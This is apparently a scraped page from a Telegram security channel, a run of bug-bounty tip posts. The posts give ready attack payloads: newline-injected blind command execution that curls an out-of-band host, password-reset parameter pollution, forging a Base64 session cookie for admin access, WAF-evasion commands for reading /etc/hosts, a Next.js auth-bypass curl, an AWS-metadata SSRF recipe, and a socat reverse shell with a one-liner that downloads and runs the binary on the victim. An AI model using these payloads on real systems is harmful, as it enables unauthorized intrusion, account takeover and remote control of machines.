Brut Security
14.8K subscribers
950 photos
76 videos
290 files
992 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
πŸ”₯Never forget to check for blind RCE!πŸ’₯

I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:

;id | whoami & uname

But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE β€” still blocked.

Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?

Payload idea: Inject a newline before the actual payload:

attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun

(Use %0a for newline β€” URL encoded)

And boom β€” Blind RCE triggered! My server got the hit instantly.

Cybersecurity isn’t about effort β€” it’s about mindset. Deep thinking always wins over brute force.❀️
DarkShadow
❀34πŸ‘9πŸ”₯7🐳3
πŸ”₯You can findπŸ’₯
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎

target.com/hidden this page required authentication or redirect to /login page.

Try: target.com/login/hidden

OMG! Auth bypass βœ…
πŸ‘19πŸ€”12❀7πŸ”₯3
Password Reset Bypass Trick πŸŒ€

Some poorly secured endpoints accept multiple email parameters.😳

Try this:

POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded

[email protected]&[email protected]

Or in JSON:

{
"email": ["[email protected]", "[email protected]"]
}

If the app sends the reset link to both emails… you’re in.⚑
Now imagine if the victim is an admin β€” hello dashboard, hello bounty!πŸ’°

#bugbountytips
πŸ‘28❀9πŸ‘¨β€πŸ’»6πŸ”₯1πŸ€”1πŸ™1🐳1
Recently disclosed hackerone critical bug, which can exploitable under few minutes!

POC:
GET /reports/***.json HTTP/2
Host: hackerone.com

If you all guys interested to know simple and Smart tricks β€” never forget to react ❀️
❀77πŸ‘16πŸ—Ώ11πŸ”₯5πŸ‘2
A simple hunt can flip the whole game!πŸŒ€
While testing a web app, I noticed this suspicious-looking session cookie:

Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==

I quickly ran it through Base64 decoding:

echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}

Wow 😳 β€” it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...

I modified the role from user to admin:

echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=

Then replaced the cookie:

Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=

BOOM πŸ’₯ Instantly, we got admin access!πŸ”₯

Follow me πŸ‘‰πŸΌ ...DarkShadow...
πŸ‘13πŸ”₯10πŸ‘3
🀫Everyone Let's dive deep into the art of WAF bypass techniques β€” a must-know skill for every serious bug bounty hunter.⚑

⚑Bypass Series for bug hunters😎

Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - πŸ§™β€β™‚οΈ
man /etc/hosts - 😎
nl /etc/hosts - 🀯
less /etc/hosts - 🀫
more /etc/hosts - 😌
strings /etc/hosts - 😁
tail /etc/hosts - πŸ˜…
head /etc/hosts -πŸ₯±

Follow meπŸ‘‰πŸΌ DarkShadow
#Bugbountytips #series
πŸ”₯21❀6πŸ‘4
⚑Bypass Series for bug hunters😎

Part-2

Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null

Follow meπŸ‘‰πŸΌ DarkShadow
#Bugbountytips #series@brutsecurity
πŸ”₯17πŸ‘6
πŸ”₯With the right dork, the whole game changesβ€”recon becomes domination.😌

Dork: inurl:search.php inurl:sqlQuery inurl:&

For more followπŸ‘‰πŸΌ DarkShadow

#bugbountytips
πŸ‘17πŸ”₯5❀1πŸ‘1🐳1
πŸŒ€ This is wild!

You’ve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β€” but there’s another less-known yet similar vulnerability: CVE-2024-51479.

This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.

Proof of Concept (PoC):

curl https://target.com/?__nextLocale=/admin

This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.

I found a very cool article explaining everything in detail:

https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
πŸ‘8❀5πŸ”₯5πŸ‘3🫑1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸš€ New Script Alert – Subdomain Monitoring (Coming Soon!)
from Brut Security

For those who’ve been waiting on a simple and efficient way to monitor subdomains automatically β€” your wait is almost over. 😌

We’ve been working on a Bash script that:

βœ… Monitors your target domains every 6 hours
βœ… Uses subfinder, anew, and notify
βœ… Sends actual new subdomains as file attachments directly to your Discord webhook
βœ… Clean, lightweight & made for practical usage in recon and bug bounty

The release isn’t today β€” dropping next week, but thought I’d give you all a heads-up.

If you’re into bug hunting, automation, or OSINT β€” this might be super useful for your workflow.

πŸ” Share with your team
❀️ React if you’re excited
Let’s get the word out before the launch!

#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
21❀30πŸ‘6πŸ”₯4πŸ‘2
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
πŸ”₯22❀13
⚑Convert your basic nc reverse shell to a pro interactive shellπŸ˜‰

⚑Bash Series for bug hunters😎

Part-1
Use python to Spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Use this command to use clear command:
export TERM=xterm-256color

Get a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] '

Use those alias for speed up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'


To close the shell temporally:
Press control+Z

Use this command to back again session:
stty raw -echo; fg


Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?

😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯10πŸ—Ώ8πŸ‘5
⚑Bypass Series for bug hunters😎

Part-3

Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

cat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect
cat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)

😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ‘8❀5πŸ”₯3
⚑Bash Series for bug hunters😎

Part-2

Stop using directly nc and try with the following command:
rlwrap -cAr nc -lvnp <port>
Or
rlwrap -f . -r nc -lnvp <port>

Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).

For full interactive keyboard controls, use a socat interactive shell:

On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>

On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>

If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>

to stop socat:
ps aux | grep socat
Kill -9 socat <PID>

Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.


😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯9❀2πŸ‘1
⚑HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata β€” disclosed and rewarded $25,000! 🀯

πŸŒ€ The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.

POC Steps:

1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click β€œApply” (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata

Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β€” don’t forget to react & share ❀️

😁Follow meπŸ‘‰πŸΌ DarkShadow
πŸ”₯28❀10πŸ—Ώ9πŸ‘5🫑2
This is really cool πŸ”₯

An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.

https://github.com/jthack/ffufai?tab=readme-ov-file

#bugbountytips #bugbounty #cybersecurity
πŸ‘13πŸ”₯2